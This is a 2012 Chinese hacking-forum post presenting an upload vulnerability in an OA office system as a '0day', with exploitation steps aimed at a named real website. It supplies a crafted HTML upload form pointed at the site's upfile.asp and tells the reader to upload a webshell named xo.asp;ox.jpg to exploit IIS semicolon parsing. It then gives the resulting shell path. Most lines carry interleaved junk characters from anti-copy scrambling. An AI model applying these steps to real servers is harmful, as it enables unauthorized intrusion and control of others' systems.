中国网络渗透测试联盟

标题: 全能OA办公系统0day OA办公系统漏洞 上传漏洞 [打印本页]

作者: admin    时间: 2012-11-21 13:45
标题: 全能OA办公系统0day OA办公系统漏洞 上传漏洞
全能OA办公系统 上传漏洞2 [  {, C4 ^% z$ }. k( w
- E2 l5 p: C2 N6 n
系统介绍:. ^9 @& o; o- [6 W- X

" B$ E; j' {8 \; ~/ k全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。
! {% E+ }6 q. S& b7 S! b: b4 J1 P
: K  Q2 d/ a2 b$ I. o主要功能:  U7 p5 R1 `. H
公司通告 * f/ h2 T; X6 T4 _% E" ?
工作计划 - i: b9 |& f: k- }6 ]# g* g
通讯助理
$ G5 }, j* h5 g2 `客户资源 3 O) Y& C# }% u" c" r
我的公文 # p" C& H3 Q' V: E5 v% d% T
公文传阅 $ m9 n4 H4 S2 i4 Q
公共资源
9 y- Q8 ?7 k. s资源预约
" ?7 F/ v! d& g3 g) W8 ^今日考勤
- c  i6 \1 `% }1 Z% r- p个人计划 7 E% ^8 M- S) t+ ]! t
个人通讯录
9 A! ?* t" F4 A个人基本档案
" K0 r9 M5 v1 T" }4 s) g* _未读邮件
8 [) P" J: M: d2 \- s发邮件
; ]6 v  p. d$ B收件夹
  J4 B: \+ o% O) i- ]寄件夹 / ~* x' U3 H+ E, q
网络硬盘 , M9 u2 A/ h9 f. j6 e% Z2 u
网络会议 ' g$ l& S( Y5 u, ^) S3 `! ~2 ^/ N
网络调查 / X3 s  X/ G7 Z
交流论坛
6 a( Y; e! l( I: I8 w, `4 z
  o# j: c, K- f: g- \/ d有兴趣测试的朋友可以下源码看看& l$ `, e9 q0 D7 b% B6 d

; e8 [7 \) \0 ]5 Y源码下载:5 {4 W! a. c  n1 Q* B

) V3 v% x5 f* S3 xhttp://www.mycodes.net/30/4750.htm  g& p$ J" Z1 o7 M0 X" j
7 c0 H- [. i0 `0 K
漏洞介绍:0 `+ B/ p3 `- R9 s) m

" O% N7 c% d& |5 O9 D2 d* j. S由upfile.asp上传文件漏洞引起
+ p' v* h  j" d$ ?: j
* X7 P0 l' @$ W3 V2 L6 u测试方法:
) _" Z- Y3 r! c  i+ [* q7 N: c2 m9 }4 E  |6 p4 B' q! W
使用名小子上传http://www.itlynn.com/upfile.asp即可
7 u8 W* o/ `0 Z; k
0 D; i& O. [" N# H5 z如果upfile.asp文件被删除不存在。
) O! H$ n9 w! V* C1 W
; h2 ~/ d0 {5 b, z* t. Y. ~; Y  那么可以试着访问http://www.itlynn.com/upfile/upfile.asp/ K# b/ {4 l  R: f9 z# s1 H' k
# q0 t; n# a! ~: Z0 o* H% y2 Y
如果存在那么将如下代码保存为upfile.html。
1 _2 f3 M: B# C1 `+ i0 e( Q& e  \# `6 u/ t
然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp
$ O5 }7 {& [1 c, \# @7 q2 o
, Q- n1 {+ |- i6 f& i0 I1 ~
1 F8 {5 M7 `) i% S. H5 k1 P7 L& l  U. \8 Z- ?
01 <table border='0' align="center" cellpadding="5">
4 x$ Z2 u6 |6 t9 j
6 x4 J& O6 s$ h. X4 T  {$ b02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1">
8 D3 @# [3 u3 S, a" P) u
% Y- |' s! i, N( z1 {& g03 <tr>
- B% e$ _" Y5 a0 [# y
7 w$ M7 s. b7 [# @04             <td>报错:</td> 7 y  c# p8 M8 t7 a3 @, ]
6 l% |( i, C8 _& a; S$ r3 d1 j9 q* t
05             <td><input type='radio' name='errnumber' value='0'> 4 [0 G  U! a$ q5 n5 T* F2 V- |- T

& }# T. j" m; J' y. s06               自动更名
8 l6 V3 X+ ?) R. n" M# ^$ _0 ], I+ d6 r2 b
07               <input type='radio' name='errnumber' value='1' checked>
- S0 p) X- z/ L; n$ h
  G: g: u* S. ?. Q7 @: [8 g! ?08               报错方式 ; a% c7 W, u) @1 _

4 }2 a2 f- e6 O( A7 Z8 Y09               <input type='radio' name='errnumber' value='2'> 2 E* P! k  Y+ b
7 G! r4 t% I* D" y
10               直接覆盖</td> 2 M- }, f( i2 d; m5 `) E+ ~

* \* b! j) o1 I& L- j( {* M11           </tr>
: W; `' V$ `9 U$ F
) M3 ], D7 h! x+ Z- |1 z( A; H8 d12           <tr> ) o3 c8 D. i' K8 Y- J
4 }- S$ r2 j! \% z0 e6 u
13             <td>主题:</td> 7 P4 m( U5 Q( d  @* k5 B% B

% J& N# X9 K# L9 {/ ~9 X7 S3 g14             <td><input type='text' name='filename' size='30'></td> ( |! U9 n, r& x. T
4 E& W$ ^2 v# V5 U8 U
15           </tr>
, F( N' ]8 ~8 R! B- ?0 r  A9 }' T4 [
7 M! s1 w% `  l7 i0 y9 k, i# L16           <tr> 1 d6 C- H8 `5 }! G' W) f& I
! v0 l* L( @8 j( x% D" J& ]8 H
17             <td>文件:</td>
. n# k9 ]' n% i7 `1 p2 s1 c1 u" x, F  G6 I
18             <td><input type="file"name="fruit"size="30"></td> 4 M1 X& x& E4 B; `! f9 b' b$ Q

) ]0 v5 w' F: P3 k- f1 }1 X19           </tr>
/ [- O$ G. V: N  `% ]) e
4 L9 |5 H* \& h$ f, p. m% G20           <tr>
, N  _$ q, |& T
% p$ A0 d  P$ }. I8 X21             <td valign='top'>简介:</td> . `+ S; b1 r% p; F

$ V( x; E" a4 v  A( q. E22             <td><textarea name='fileExt' cols='40' rows='5'></textarea></td>
' t+ N- T2 S; l' a( c7 h
( a, M$ t7 m. p! n. u7 G. K23           </tr> ' W' C  k* ~. I
, `/ d  M3 o: n$ e# Y$ d8 A
24   
5 B# p/ b$ A3 g' L* O2 G' j
4 Q+ C% W4 ]) l. J25             <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td>
( B3 o9 M" U3 G; n" w% ~
7 N! s5 W! U8 ]8 D26           </tr>
2 X9 h' q9 ]  |# {; m& H! R
; k( Z& V, |  ]1 U2 q% `2 t27         </form> 9 x1 i5 a: x' x( G

4 z% W3 i( W. v8 p! K然后打开上传一个文件名为xo.asp;ox.jpg的文件。
* C' _. M0 ?2 `2 n) Z7 K6 O, N1 Q3 S7 n* g- O' l9 I2 o3 M* ~

+ Q+ y3 j4 V  H1 l" H. a( ^7 Y7 p, e  e# e! F9 w! m7 X. z8 Z+ J
上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg# Y' y& y" l/ I4 b% F& P

2 |5 t" S+ {3 L此漏洞需要配合解析漏洞利用。
& h- X6 I3 x6 _- h1 B% ~  r$ E, f. j3 K0 j. D





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2